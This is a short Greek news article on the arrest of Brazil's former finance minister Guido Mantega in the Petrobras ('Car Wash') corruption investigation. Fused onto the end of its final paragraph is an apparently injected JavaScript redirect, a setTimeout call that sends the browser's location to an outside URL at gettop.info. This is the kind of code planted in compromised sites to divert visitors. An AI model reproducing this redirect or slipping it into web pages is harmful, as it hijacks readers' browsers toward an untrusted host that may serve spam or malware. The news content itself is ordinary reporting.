Βραζιλία: Συνελήφθη για διαφθορά πρώην υπουργός Οικονομικών του Λούλα και της Ρούσεφ

0
7

 

Για διαφθορά στην υπόθεση Petrobras, συνελήφθη ο πρώην υπουργός Οικονομικών της Βραζιλίας επί προεδρίας Λούλα ντα Σίλβα και Ντίλμα Ρούσεφ, Γκουίντο Μαντέγα σύμφωνα με βραζιλιάνικα ΜΜΕ.

Ο Μαντέγα, που ήταν επίσης στέλεχος του Κόμματος των Εργατών (PT) όταν το τελευταίο βρισκόταν στην εξουσία, συνελήφθη σε νοσοκομείο του Σάο Πάολο όπου συνόδευε τη σύζυγό του, σύμφωνα με την ενημερωτική ιστοσελίδα G1.

Παράλληλα, η ομοσπονδιακή αστυνομία ανακοίνωσε ότι θα δώσει συνέντευξη Τύπου για μια νέα σειρά συλλήψεων στο πλαίσιο αυτής της τεράστιας υπόθεσης διαφθοράς που συνδέεται με την κρατική πετρελαϊκή εταιρία Petrobras.

Χωρίς να κατονομάζει τον Γκουίντο Μαντέγα ή το PT, η αστυνομία επιβεβαίωσε, σε ανακοίνωσή της, πως ο πρώην υπουργός Οικονομικών «είχε ενεργήσει το 2012 με μία από τις εταιρίες ώστε να διαπραγματευθεί τη μεταφορά χρημάτων προκειμένου να εξοφληθούν οι οφειλές της εκστρατείας του πολιτικού κόμματος εκείνη τη στιγμή».

Οι συλλήψεις εντάσσονται στο πλαίσιο της υπόθεσης «Επιχείρηση Πλύσιμο Αυτοκινήτου». Η έρευνα αυτή, που ξεκίνησε τον Μάρτιο του 2014 σε πρατήρια βενζίνης, αποκάλυψε ένα τεράστιο σκάνδαλο διαφθοράς στο εσωτερικό της Petrobras. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here